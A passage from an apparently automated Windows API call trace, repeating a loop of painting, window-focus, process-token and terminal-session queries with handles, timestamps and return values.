hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.810] TextOutW (hdc=0x0, x=554, y=1149, lpString="", c=0) returned 1 [0071.810] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.810] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.810] GetTickCount () returned 0x1f0b4 [0071.812] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.812] SetForegroundWindow (hWnd=0x0) returned 0 [0071.812] BringWindowToTop (hWnd=0x0) returned 0 [0071.812] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x30c) returned 1 [0071.812] GetTokenInformation (in: TokenHandle=0x30c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.812] GetLastError () returned 0x7a [0071.812] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.812] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.813] WTSFreeMemory (pMemory=0x0) [0071.813] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.813] TextOutW (hdc=0x0, x=564, y=1174, lpString="", c=0) returned 1 [0071.813] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.813] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.813] GetTickCount () returned 0x1f0b4 [0071.814] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.814] SetForegroundWindow (hWnd=0x0) returned 0 [0071.814] BringWindowToTop (hWnd=0x0) returned 0 [0071.814] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x310) returned 1 [0071.814] GetTokenInformation (in: TokenHandle=0x310, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.814] GetLastError () returned 0x7a [0071.814] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.814] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.815] WTSFreeMemory (pMemory=0x0) [0071.815] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.815] TextOutW (hdc=0x0, x=574, y=1199, lpString="", c=0) returned 1 [0071.815] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.818] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.818] GetTickCount () returned 0x1f0c3 [0071.820] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.820] SetForegroundWindow (hWnd=0x0) returned 0 [0071.820] BringWindowToTop (hWnd=0x0) returned 0 [0071.820] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x314) returned 1 [0071.820] GetTokenInformation (in: TokenHandle=0x314, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.820] GetLastError () returned 0x7a [0071.820] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.820] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.821] WTSFreeMemory (pMemory=0x0) [0071.821] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.822] TextOutW (hdc=0x0, x=584, y=1224, lpString="", c=0) returned 1 [0071.823] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.823] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.823] GetTickCount () returned 0x1f0c3 [0071.824] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.824] SetForegroundWindow (hWnd=0x0) returned 0 [0071.824] BringWindowToTop (hWnd=0x0) returned 0 [0071.824] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x318) returned 1 [0071.824] GetTokenInformation (in: TokenHandle=0x318, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.824] GetLastError () returned 0x7a [0071.824] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.824] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.825] WTSFreeMemory (pMemory=0x0) [0071.825] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.825] TextOutW (hdc=0x0, x=594, y=1249, lpString="", c=0) returned 1 [0071.825] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.825] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.825] GetTickCount () returned 0x1f0c3 [0071.827] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.827] SetForegroundWindow (hWnd=0x0) returned 0 [0071.827] BringWindowToTop (hWnd=0x0) returned 0 [0071.827] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x31c) returned 1 [0071.827] GetTokenInformation (in: TokenHandle=0x31c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.827] GetLastError () returned 0x7a [0071.827] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.828] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.828] WTSFreeMemory (pMemory=0x0) [0071.828] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.828] TextOutW (hdc=0x0, x=604, y=1274, lpString="", c=0) returned 1 [0071.828] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.828] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.828] GetTickCount () returned 0x1f0c3 [0071.829] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.829] SetForegroundWindow (hWnd=0x0) returned 0 [0071.829] BringWindowToTop (hWnd=0x0) returned 0 [0071.830] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x320) returned 1 [0071.830] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.830] GetLastError () returned 0x7a [0071.830] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.830] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.830] WTSFreeMemory (pMemory=0x0) [0071.830] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.830] TextOutW (hdc=0x0, x=614, y=1299, lpString="", c=0) returned 1 [0071.830] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.830] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.830] GetTickCount () returned 0x1f0c3 [0071.834] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.834] SetForegroundWindow (hWnd=0x0) returned 0 [0071.834] BringWindowToTop (hWnd=0x0) returned 0 [0071.835] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x324) returned 1 [0071.835] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.835] GetLastError () returned 0x7a [0071.835] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.835] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.835] WTSFreeMemory (pMemory=0x0) [0071.835] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.836] TextOutW (hdc=0x0, x=624, y=1324, lpString="", c=0) returned 1 [0071.836] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.836] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.836] GetTickCount () returned 0x1f0d3 [0071.837] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.837] SetForegroundWindow (hWnd=0x0) returned 0 [0071.837] BringWindowToTop (hWnd=0x0) returned 0 [0071.837] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x328) returned 1 [0071.837] GetTokenInformation (in: TokenHandle=0x328, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.837] GetLastError () returned 0x7a [0071.837] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.837] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.838] WTSFreeMemory (pMemory=0x0) [0071.838] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.838] TextOutW (hdc=0x0, x=634, y=1349, lpString="", c=0) returned 1 [0071.838] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.838] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.838] GetTickCount () returned 0x1f0d3 [0071.840] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.840] SetForegroundWindow (hWnd=0x0) returned 0 [0071.840] BringWindowToTop (hWnd=0x0) returned 0 [0071.840] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x32c) returned 1 [0071.840] GetTokenInformation (in: TokenHandle=0x32c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.840] GetLastError () returned 0x7a [0071.840] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.840] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.841] WTSFreeMemory (pMemory=0x0) [0071.841] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.841] TextOutW (hdc=0x0, x=644, y=1374, lpString="", c=0) returned 1 [0071.841] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.841] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.841] GetTickCount () returned 0x1f0d3 [0071.842] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.843] SetForegroundWindow (hWnd=0x0) returned 0 [0071.843] BringWindowToTop (hWnd=0x0) returned 0 [0071.843] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x330) returned 1 [0071.843] GetTokenInformation (in: TokenHandle=0x330, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.843] GetLastError () returned 0x7a [0071.843] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.843] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.843] WTSFreeMemory (pMemory=0x0) [0071.844] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.844] TextOutW (hdc=0x0, x=654, y=1399, lpString="", c=0) returned 1 [0071.844] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.844] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.844] GetTickCount () returned 0x1f0d3 [0071.846] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.846] SetForegroundWindow (hWnd=0x0) returned 0 [0071.846] BringWindowToTop (hWnd=0x0) returned 0 [0071.846] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x334) returned 1 [0071.846] GetTokenInformation (in: TokenHandle=0x334, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.846] GetLastError () returned 0x7a [0071.846] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.846] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.851] WTSFreeMemory (pMemory=0x0) [0071.851] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.851] TextOutW (hdc=0x0, x=664, y=1424, lpString="", c=0) returned 1 [0071.851] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.851] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.851] GetTickCount () returned 0x1f0e3 [0071.852] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.852] SetForegroundWindow (hWnd=0x0) returned 0 [0071.852] BringWindowToTop (hWnd=0x0) returned 0 [0071.852] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x338) returned 1 [0071.853] GetTokenInformation (in: TokenHandle=0x338, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.853] GetLastError () returned 0x7a [0071.853] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.853] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.853] WTSFreeMemory (pMemory=0x0) [0071.853] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.853] TextOutW (hdc=0x0, x=674, y=1449, lpString="", c=0) returned 1 [0071.853] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.853] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.853] GetTickCount () returned 0x1f0e3 [0071.855] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.855] SetForegroundWindow (hWnd=0x0) returned 0 [0071.855] BringWindowToTop (hWnd=0x0) returned 0 [0071.855] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x33c) returned 1 [0071.855] GetTokenInformation (in: TokenHandle=0x33c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.856] GetLastError () returned 0x7a [0071.856] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.856] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.856] WTSFreeMemory (pMemory=0x0) [0071.856] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.856] TextOutW (hdc=0x0, x=684, y=1474, lpString="", c=0) returned 1 [0071.856] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.856] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.856] GetTickCount () returned 0x1f0e3 [0071.857] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.857] SetForegroundWindow (hWnd=0x0) returned 0 [0071.857] BringWindowToTop (hWnd=0x0) returned 0 [0071.857] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x340) returned 1 [0071.857] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.857] GetLastError () returned 0x7a [0071.857] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.857] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.858] WTSFreeMemory (pMemory=0x0) [0071.858] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.858] TextOutW (hdc=0x0, x=694, y=1499, lpString="", c=0) returned 1 [0071.858] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.858] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.858] GetTickCount () returned 0x1f0e3 [0071.860] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.860] SetForegroundWindow (hWnd=0x0) returned 0 [0071.860] BringWindowToTop (hWnd=0x0) returned 0 [0071.860] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x344) returned 1 [0071.860] GetTokenInformation (in: TokenHandle=0x344, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.860] GetLastError () returned 0x7a [0071.860] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.860] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.860] WTSFreeMemory (pMemory=0x0) [0071.860] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.861] TextOutW (hdc=0x0, x=704, y=1524, lpString="", c=0) returned 1 [0071.861] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.861] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.861] GetTickCount () returned 0x1f0e3 [0071.861] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.861] SetForegroundWindow (hWnd=0x0) returned 0 [0071.861] BringWindowToTop (hWnd=0x0) returned 0 [0071.861] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x348) returned 1 [0071.862] GetTokenInformation (in: TokenHandle=0x348, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.862] GetLastError () returned 0x7a [0071.862] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.862] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.862] WTSFreeMemory (pMemory=0x0) [0071.862] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.862] TextOutW (hdc=0x0, x=714, y=1549, lpString="", c=0) returned 1 [0071.862] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.862] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.862] GetTickCount () returned 0x1f0f2 [0071.864] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.864] SetForegroundWindow (hWnd=0x0) returned 0 [0071.864] BringWindowToTop (hWnd=0x0) returned 0 [0071.864] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x34c) returned 1 [0071.864] GetTokenInformation (in: TokenHandle=0x34c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.864] GetLastError () returned 0x7a [0071.864] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.864] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.865] WTSFreeMemory (pMemory=0x0) [0071.865] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.865] TextOutW (hdc=0x0, x=724, y=1574, lpString="", c=0) returned 1 [0071.865] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.865] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.865] GetTickCount () returned 0x1f0f2 [0071.866] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.866] SetForegroundWindow (hWnd=0x0) returned 0 [0071.866] BringWindowToTop (hWnd=0x0) returned 0 [0071.866] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x350) returned 1 [0071.866] GetTokenInformation (in: TokenHandle=0x350, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.866] GetLastError () returned 0x7a [0071.866] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.866] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.866] WTSFreeMemory (pMemory=0x0) [0071.866] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.866] TextOutW (hdc=0x0, x=734, y=1599, lpString="", c=0) returned 1 [0071.867] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.867] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.867] GetTickCount () returned 0x1f0f2 [0071.868] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.868] SetForegroundWindow (hWnd=0x0) returned 0 [0071.868] BringWindowToTop (hWnd=0x0) returned 0 [0071.868] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x354) returned 1 [0071.869] GetTokenInformation (in: TokenHandle=0x354, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.869] GetLastError () returned 0x7a [0071.869] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.869] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.869] WTSFreeMemory (pMemory=0x0) [0071.869] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.869] TextOutW (hdc=0x0, x=744, y=1624, lpString="", c=0) returned 1 [0071.869] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.869] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.869] GetTickCount () returned 0x1f0f2 [0071.870] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.870] SetForegroundWindow (hWnd=0x0) returned 0 [0071.870] BringWindowToTop (hWnd=0x0) returned 0 [0071.870] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x358) returned 1 [0071.870] GetTokenInformation (in: TokenHandle=0x358, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.870] GetLastError () returned 0x7a [0071.870] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.870] WTSQuerySessionInformationA (in: hServer=0x0, 